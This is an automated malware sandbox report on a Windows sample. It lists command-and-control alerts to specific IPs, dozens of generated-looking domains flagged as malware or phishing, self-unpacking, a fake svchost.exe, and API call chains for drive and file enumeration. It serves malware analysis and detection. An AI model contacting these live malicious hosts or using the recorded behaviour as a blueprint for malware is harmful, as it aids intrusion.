2024-11-11T18:51:09.747199+010028048521Malware Command and Control Activity Detected192.168.2.65021691.195.240.1980TCP
2024-11-11T18:51:09.868031+010028048521Malware Command and Control Activity Detected192.168.2.652171188.114.96.3443TCP
2024-11-11T18:51:09.951696+010028048521Malware Command and Control Activity Detected192.168.2.650215154.212.231.8280TCP
2024-11-11T18:51:10.410076+010028048521Malware Command and Control Activity Detected192.168.2.652164199.191.50.8380TCP
2024-11-11T18:51:10.742762+010028048521Malware Command and Control Activity Detected192.168.2.652123208.100.26.24580TCP
2024-11-11T18:51:11.007062+010028048521Malware Command and Control Activity Detected192.168.2.652128188.114.96.380TCP
2024-11-11T18:51:11.028634+010028048521Malware Command and Control Activity Detected192.168.2.65022618.208.156.24880TCP
2024-11-11T18:51:11.169370+010028048521Malware Command and Control Activity Detected192.168.2.650217199.191.50.8380TCP
2024-11-11T18:51:11.524536+010028048521Malware Command and Control Activity Detected192.168.2.650227154.212.231.8280TCP
2024-11-11T18:51:12.223562+010028048521Malware Command and Control Activity Detected192.168.2.650234208.100.26.24580TCP
2024-11-11T18:51:12.471105+010028048521Malware Command and Control Activity Detected192.168.2.650228199.191.50.8380TCP
2024-11-11T18:51:13.389967+010028048521Malware Command and Control Activity Detected192.168.2.6502353.94.10.3480TCP
2024-11-11T18:51:13.582954+010028048521Malware Command and Control Activity Detected192.168.2.650236199.191.50.8380TCP
2024-11-11T18:51:13.851378+010028048521Malware Command and Control Activity Detected192.168.2.65023944.221.84.10580TCP
2024-11-11T18:51:13.909835+010028048521Malware Command and Control Activity Detected192.168.2.65024244.221.84.10580TCP
2024-11-11T18:51:13.940191+010028048521Malware Command and Control Activity Detected192.168.2.650244178.162.203.22680TCP
2024-11-11T18:51:14.030524+010028048521Malware Command and Control Activity Detected192.168.2.650243162.255.119.10280TCP
2024-11-11T18:51:14.291524+010028048521Malware Command and Control Activity Detected192.168.2.650238154.212.231.8280TCP
2024-11-11T18:51:14.965158+010028048521Malware Command and Control Activity Detected192.168.2.65024691.195.240.1980TCP
2024-11-11T18:51:15.357751+010028048521Malware Command and Control Activity Detected192.168.2.650241199.191.50.8380TCP
2024-11-11T18:51:17.440468+010028048521Malware Command and Control Activity Detected192.168.2.659192154.212.231.8280TCP
2024-11-11T18:51:19.730439+010028048521Malware Command and Control Activity Detected192.168.2.659197199.59.243.22780TCP
2024-11-11T18:51:19.731431+010028048521Malware Command and Control Activity Detected192.168.2.65919844.221.84.10580TCP
2024-11-11T18:51:19.732974+010028048521Malware Command and Control Activity Detected192.168.2.65919544.221.84.10580TCP
2024-11-11T18:51:19.733944+010028048521Malware Command and Control Activity Detected192.168.2.6591993.94.10.3480TCP
2024-11-11T18:51:21.480505+010028048521Malware Command and Control Activity Detected192.168.2.659196199.191.50.8380TCP
2024-11-11T18:51:22.284590+010028048521Malware Command and Control Activity Detected192.168.2.659204178.162.203.22680TCP
2024-11-11T18:51:22.296321+010028048521Malware Command and Control Activity Detected192.168.2.65920699.83.170.380TCP
2024-11-11T18:51:22.304407+010028048521Malware Command and Control Activity Detected192.168.2.65920818.208.156.24880TCP
2024-11-11T18:51:22.316762+010028048521Malware Command and Control Activity Detected192.168.2.659205208.100.26.24580TCP
2024-11-11T18:51:22.371379+010028048521Malware Command and Control Activity Detected192.168.2.659200188.114.96.380TCP
2024-11-11T18:51:22.403885+010028048521Malware Command and Control Activity Detected192.168.2.659203162.255.119.10280TCP
2024-11-11T18:51:22.755937+010028048521Malware Command and Control Activity Detected192.168.2.659207154.212.231.8280TCP
2024-11-11T18:51:25.660834+010028048521Malware Command and Control Activity Detected192.168.2.659214178.162.203.22680TCP
2024-11-11T18:51:25.685561+010028048521Malware Command and Control Activity Detected192.168.2.6592133.94.10.3480TCP
2024-11-11T18:51:25.685857+010028048521Malware Command and Control Activity Detected192.168.2.65921544.221.84.10580TCP
2024-11-11T18:51:25.685967+010028048521Malware Command and Control Activity Detected192.168.2.65921818.208.156.24880TCP
2024-11-11T18:51:25.689589+010028048521Malware Command and Control Activity Detected192.168.2.65922299.83.170.380TCP
2024-11-11T18:51:25.689589+010028048521Malware Command and Control Activity Detected192.168.2.65921944.221.84.10580TCP
2024-11-11T18:51:25.691993+010028048521Malware Command and Control Activity Detected192.168.2.659216199.59.243.22780TCP
2024-11-11T18:51:25.788734+010028048521Malware Command and Control Activity Detected192.168.2.659220162.255.119.10280TCP
2024-11-11T18:51:26.029010+010028048521Malware Command and Control Activity Detected192.168.2.659223188.114.96.380TCP
2024-11-11T18:51:26.143279+010028048521Malware Command and Control Activity Detected192.168.2.659221154.212.231.8280TCP
2024-11-11T18:51:26.702774+010028048521Malware Command and Control Activity Detected192.168.2.659212199.191.50.8380TCP
2024-11-11T18:51:27.046754+010028048521Malware Command and Control Activity Detected192.168.2.65922644.221.84.10580TCP
2024-11-11T18:51:27.128722+010028048521Malware Command and Control Activity Detected192.168.2.659225162.255.119.10280TCP
2024-11-11T18:51:32.854009+010028048521Malware Command and Control Activity Detected192.168.2.65923318.208.156.24880TCP
2024-11-11T18:51:34.292569+010028048521Malware Command and Control Activity Detected192.168.2.659238178.162.203.22680TCP
2024-11-11T18:51:34.292614+010028048521Malware Command and Control Activity Detected192.168.2.65923599.83.170.380TCP
2024-11-11T18:51:34.292655+010028048521Malware Command and Control Activity Detected192.168.2.65923744.221.84.10580TCP
2024-11-11T18:51:34.292697+010028048521Malware Command and Control Activity Detected192.168.2.6592413.94.10.3480TCP
2024-11-11T18:51:34.334665+010028048521Malware Command and Control Activity Detected192.168.2.659239188.114.96.380TCP
2024-11-11T18:51:34.630829+010028048521Malware Command and Control Activity Detected192.168.2.659236154.212.231.8280TCP
2024-11-11T18:51:35.819106+010028048521Malware Command and Control Activity Detected192.168.2.65925091.195.240.1980TCP
2024-11-11T18:51:36.200017+010028048521Malware Command and Control Activity Detected192.168.2.659240199.191.50.8380TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: UMwpXhA46R.exeAvira: detected
Antivirus detection for URL or domain
Source: http://qedysov.com/login.phpAvira URL Cloud: Label: malware
Source: http://qekyqoq.com/login.phpAvira URL Cloud: Label: malware
Source: http://qexyfuq.com/pgAvira URL Cloud: Label: malware
Source: http://qedysol.com/login.phpAvira URL Cloud: Label: malware
Source: http://vopycoc.com/login.phpAvira URL Cloud: Label: malware
Source: http://pumywug.com/Avira URL Cloud: Label: phishing
Source: http://qeqykop.com/login.phpAvira URL Cloud: Label: malware
Source: http://vocyzek.com/http://gatyviw.com/Avira URL Cloud: Label: malware
Source: http://qetyvil.com/HAvira URL Cloud: Label: malware
Source: http://volyjym.com/login.phpAvira URL Cloud: Label: malware
Source: http://gadycew.com/login.phpAvira URL Cloud: Label: malware
Source: http://vocyjet.com/login.phpAvira URL Cloud: Label: malware
Source: http://qeqyxov.com/login.phpAvira URL Cloud: Label: malware
Source: http://puzylyp.com/login.phpAvira URL Cloud: Label: malware
Source: http://lykyfud.com/login.phpAvira URL Cloud: Label: malware
Source: http://lyxyvyn.com/login.phpAvira URL Cloud: Label: malware
Source: http://galyvuz.com/login.phpAvira URL Cloud: Label: malware
Source: http://lyrywoj.com/login.phpAvira URL Cloud: Label: malware
Source: http://vowyrif.com/login.phpAvira URL Cloud: Label: malware
Source: http://lymyvin.com/Avira URL Cloud: Label: malware
Source: http://ww16.vofycot.com/login.php?sub1=20241112-0450-397d-84b8-860db74cb63bAvira URL Cloud: Label: malware
Source: http://vocyruk.com/login.phpAvira URL Cloud: Label: phishing
Source: http://lyryman.com/login.phpAvira URL Cloud: Label: malware
Source: http://lyvysur.com/login.phpAvira URL Cloud: Label: malware
Source: http://vowypim.com/login.phpAvira URL Cloud: Label: malware
Source: http://qexyfuq.com/login.phpAvira URL Cloud: Label: malware
Source: http://vofypam.com/http://pujycyp.com/http://volydyk.com/http://pujycyp.com/http://qetyrul.com/http:Avira URL Cloud: Label: malware
Source: http://lyvymej.com/login.phpAvira URL Cloud: Label: malware
Source: http://qebyqeq.com/login.phpAvira URL Cloud: Label: malware
Source: http://lyryled.com/login.phpAvira URL Cloud: Label: malware
Source: http://vojygok.com/login.phpAvira URL Cloud: Label: malware
Source: http://gahyvab.com/login.phpAvira URL Cloud: Label: malware
Source: http://qekysip.com/Avira URL Cloud: Label: malware
Source: http://lyryjir.com/login.phpAvira URL Cloud: Label: malware
Source: http://puzymup.com/login.phpAvira URL Cloud: Label: malware
Source: http://galydyw.com/login.phpAvira URL Cloud: Label: malware
Source: http://pujycil.com/login.phpAvira URL Cloud: Label: malware
Source: http://pumycug.com/Avira URL Cloud: Label: malware
Source: http://vojyduf.com/login.phpAvira URL Cloud: Label: malware
Source: http://lysytoj.com/login.phpAvira URL Cloud: Label: malware
Source: http://pupycuv.com/login.phpAvira URL Cloud: Label: malware
Source: http://qetykyq.com/login.phpAvira URL Cloud: Label: malware
Source: http://gatykyh.com/login.phpAvira URL Cloud: Label: malware
Source: http://vofypam.com/login.phpAvira URL Cloud: Label: malware
Source: http://gadyniw.com/login.phpAvira URL Cloud: Label: malware
Source: http://pupywyv.com/login.phpAvira URL Cloud: Label: phishing
Source: http://lygyxux.com/login.phpAvira URL Cloud: Label: malware
Source: http://volygoc.com/Avira URL Cloud: Label: malware
Source: https://puzylyp.com/login.phpAvira URL Cloud: Label: malware
Source: http://lyvynid.com/login.phpAvira URL Cloud: Label: malware
Source: http://vojybim.com/login.phpAvira URL Cloud: Label: phishing
Source: http://gadydow.com/login.phpAvira URL Cloud: Label: malware
Source: http://qeqyxyp.com/login.phpAvira URL Cloud: Label: malware
Source: http://lysyxar.com/login.phpAvira URL Cloud: Label: malware
Source: http://lyxygax.com/login.phpAvira URL Cloud: Label: malware
Source: http://vopykum.com/login.phpAvira URL Cloud: Label: malware
Source: http://pumyjip.com/login.phpAvira URL Cloud: Label: malware
Source: http://lygyjuj.com/login.phpAvira URL Cloud: Label: malware
Source: http://ganyfuz.com/login.phpEAvira URL Cloud: Label: malware
Source: http://puvygyv.com/login.phpAvira URL Cloud: Label: malware
Source: http://pupygel.com/Avira URL Cloud: Label: malware
Source: http://qekyqop.com/login.phpAvira URL Cloud: Label: malware
Source: http://gahydyb.com/Avira URL Cloud: Label: malware
Source: http://purymog.com/http://qegylul.com/http://lyryman.com/PAvira URL Cloud: Label: malware
Source: http://lyxyxox.com/login.phpAvira URL Cloud: Label: malware
Source: http://volyquk.com/login.phpAvira URL Cloud: Label: malware
Source: http://lymyxex.com/login.phpAvira URL Cloud: Label: malware
Source: http://vonypic.com/login.phpAvira URL Cloud: Label: malware
Source: http://volyjif.com/login.phpAvira URL Cloud: Label: malware
Source: http://lysysyx.com/login.phpAvira URL Cloud: Label: malware
Source: http://puzyxip.com/login.phpAvira URL Cloud: Label: malware
Source: http://pumyxiv.com/login.phpAvira URL Cloud: Label: malware
Source: http://vofydak.com/login.phpAvira URL Cloud: Label: malware
Source: http://qedysyp.com/login.phpAvira URL Cloud: Label: phishing
Source: http://gahyvuh.com/login.phpAvira URL Cloud: Label: malware
Source: http://puzyduq.com/login.phpAvira URL Cloud: Label: malware
Source: http://puzydal.com/login.phpAvira URL Cloud: Label: malware
Source: http://qegyhig.com/login.phpYAvira URL Cloud: Label: malware
Source: http://lyxysad.com/login.phpAvira URL Cloud: Label: malware
Source: http://gahyhys.com/login.phpAvira URL Cloud: Label: malware
Source: http://purywyl.com/login.phpAvira URL Cloud: Label: malware
Source: http://vojyzik.com/login.phpAvira URL Cloud: Label: malware
Source: http://lykyjad.com/login.phpAvira URL Cloud: Label: malware
Source: http://vojycec.com/login.phpAvira URL Cloud: Label: malware
Source: http://galyfis.com/Avira URL Cloud: Label: malware
Source: http://lymymax.com/HAvira URL Cloud: Label: malware
Source: http://lyryvur.com/login.phpAvira URL Cloud: Label: malware
Source: http://volydot.com/login.phpAvira URL Cloud: Label: phishing
Source: http://pujygug.com/login.phpAvira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: UMwpXhA46R.exeReversingLabs: Detection: 81%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
Machine Learning detection for sample
Source: UMwpXhA46R.exeJoe Sandbox ML: detected

Compliance

barindex
Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeUnpacked PE file: 6.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.1240000.2.unpack
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeUnpacked PE file: 7.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.1040000.2.unpack
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeUnpacked PE file: 11.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.3270000.2.unpack
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeUnpacked PE file: 24.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2560000.2.unpack
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeUnpacked PE file: 27.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.3040000.2.unpack
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\UMwpXhA46R.exeUnpacked PE file: 0.2.UMwpXhA46R.exe.400000.2.unpack
Source: C:\Windows\apppatch\svchost.exeUnpacked PE file: 2.2.svchost.exe.400000.0.unpack
Source: UMwpXhA46R.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49732 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49748 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49770 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:54645 version: TLS 1.2
Source: unknownHTTPS traffic detected: 75.2.71.199:443 -> 192.168.2.6:54647 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:54664 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:54680 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:54701 version: TLS 1.2
Source: unknownHTTPS traffic detected: 99.83.170.3:443 -> 192.168.2.6:52120 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:52171 version: TLS 1.2
Source: unknownHTTPS traffic detected: 99.83.170.3:443 -> 192.168.2.6:50210 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50220 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:59249 version: TLS 1.2
Source: unknownHTTPS traffic detected: 99.83.170.3:443 -> 192.168.2.6:59248 version: TLS 1.2
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\wkernel32.pdb source: svchost.exe, 00000002.00000002.3427392798.000000000927C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\dll\wntdll.pdb source: svchost.exe, 00000002.00000002.3426848307.0000000009259000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: winsta.pdb source: svchost.exe, 00000002.00000002.3422148486.0000000004382000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdb source: svchost.exe, 00000002.00000002.3426848307.0000000009271000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427813652.00000000092A6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\symbols\dll\wrpcrt4.pdb\??\C:\Program Files (x86)\Windows Defender\symbols\dll\wntdll.pdb source: svchost.exe, 00000002.00000002.3426602006.0000000009206000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\winsta.pdb source: svchost.exe, 00000002.00000002.3427392798.0000000009288000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: com.qedyvap\??\C:\Program Files (x86)\Windows Defender\DLL\wkernel32.pdb source: svchost.exe, 00000002.00000002.3427876534.00000000092B8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\gacyfeb.com\??\C:\Program Files (x86)\Windows Defender\wntdll.pdb source: svchost.exe, 00000002.00000002.3427392798.0000000009288000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WinSCard.pdb\WinSCard.pdb source: svchost.exe, 00000002.00000002.3419194854.0000000003378000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: com.qegynul\??\C:\Program Files (x86)\Windows Defender\DLL\wkernel32.pdbb source: svchost.exe, 00000002.00000002.3427876534.00000000092B8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wrpcrt4.pdb source: svchost.exe, 00000002.00000002.3421903093.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3426602006.0000000009228000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\symbols\dll\WinSCard.pdbdb source: svchost.exe, 00000002.00000002.3413102831.000000000088A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wrpcrt4.pdb( source: svchost.exe, 00000002.00000002.3426602006.0000000009228000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdbwkernel32.pdb source: svchost.exe, 00000002.00000002.3419194854.0000000003378000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\dll\WinSCard.pdbdb source: svchost.exe, 00000002.00000002.3427876534.00000000092B8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbll\wntdll.pdb source: svchost.exe, 00000002.00000002.3419194854.0000000003378000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-amd64-cygwin\jdk8u281\880\build\windows-amd64\deploy\tmp\javacplexec\obj64\javacpl.pdb552 source: UMwpXhA46R.exe, svchost.exe.0.dr
Source: Binary string: WinSCard.pdb( source: svchost.exe, 00000002.00000002.3424625782.0000000007237000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-amd64-cygwin\jdk8u281\880\build\windows-amd64\deploy\tmp\javacplexec\obj64\javacpl.pdb source: UMwpXhA46R.exe, svchost.exe.0.dr
Source: Binary string: kDJwntdll.pdb source: svchost.exe, 00000002.00000002.3413471748.00000000008BC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\wntdll.pdb\** source: svchost.exe, 00000002.00000002.3427392798.000000000927C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Program Files (x86)\Windows Defender\wntdll.pdb\* source: svchost.exe, 00000002.00000002.3425216868.000000000827B000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\symbols\dll\winsta.pdb source: svchost.exe, 00000002.00000002.3426602006.0000000009206000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\wntdll.pdb source: svchost.exe, 00000002.00000002.3427392798.0000000009288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427392798.000000000927C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdbernelbase.pdb source: svchost.exe, 00000002.00000002.3419194854.0000000003378000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb source: svchost.exe, 00000002.00000002.3426848307.0000000009277000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb( source: svchost.exe, 00000002.00000002.3426848307.0000000009277000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000000.2516200393.00000000002DE000.00000002.00000001.01000000.00000009.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2606987058.00000000002DE000.00000002.00000001.01000000.00000009.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000000.2520248189.00000000002DE000.00000002.00000001.01000000.00000009.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2607414214.00000000002DE000.00000002.00000001.01000000.00000009.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000010.00000002.2585840730.00000000002DE000.00000002.00000001.01000000.00000009.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000013.00000000.2578627983.00000000002DE000.00000002.00000001.01000000.00000009.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000015.00000000.2588407921.00000000002DE000.00000002.00000001.01000000.00000009.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000018.00000002.2670222537.00000000002DE000.00000002.00000001.01000000.00000009.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000001B.00000000.2633847837.00000000002DE000.00000002.00000001.01000000.00000009.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000001E.00000000.2650762709.00000000002DE000.00000002.00000001.01000000.00000009.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000021.00000002.2734291116.00000000002DE000.00000002.00000001.01000000.00000009.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000024.00000000.2708390726.00000000002DE000.00000002.00000001.01000000.00000009.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000027.00000000.2731091721.00000000002DE000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\symbols\dll\wntdll.pdb source: svchost.exe, 00000002.00000002.3426602006.0000000009206000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdb( source: svchost.exe, 00000002.00000002.3426848307.0000000009271000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WinSCard.pdb source: svchost.exe, 00000002.00000002.3427813652.00000000092A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3424625782.0000000007237000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\dll\wrpcrt4.pdb1.3.6.1.4.1.311.60.3.2szOID_ROOT_PROGRAM_AUTO_UPDATE_END_REVOCATION source: svchost.exe, 00000002.00000002.3426848307.0000000009259000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: winsta.pdb( source: svchost.exe, 00000002.00000002.3422148486.0000000004382000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\qexyfag.com\??\C:\Program Files (x86)\Windows Defender\wntdll.pdb source: svchost.exe, 00000002.00000002.3427392798.0000000009288000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\symbols\dll\wrpcrt4.pdb source: svchost.exe, 00000002.00000002.3406954551.0000000000812000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\symbols\DLL\wkernel32.pdbb source: svchost.exe, 00000002.00000002.3413102831.000000000088A000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C766D0 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,2_2_02C766D0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C8BBE9 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,SetErrorMode,2_2_02C8BBE9
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C8BB20 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,SetErrorMode,2_2_02C8BB20
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C8D0C0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,SetErrorMode,2_2_02C8D0C0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C8D189 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,SetErrorMode,2_2_02C8D189
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C9BE40 memset,SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindClose,2_2_02C9BE40
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C97CE0 PathAddBackslashA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,2_2_02C97CE0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_0125D189 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,6_2_0125D189
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_0125D0C0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,6_2_0125D0C0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_0125BB20 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,6_2_0125BB20
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_0125BBE9 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,6_2_0125BBE9
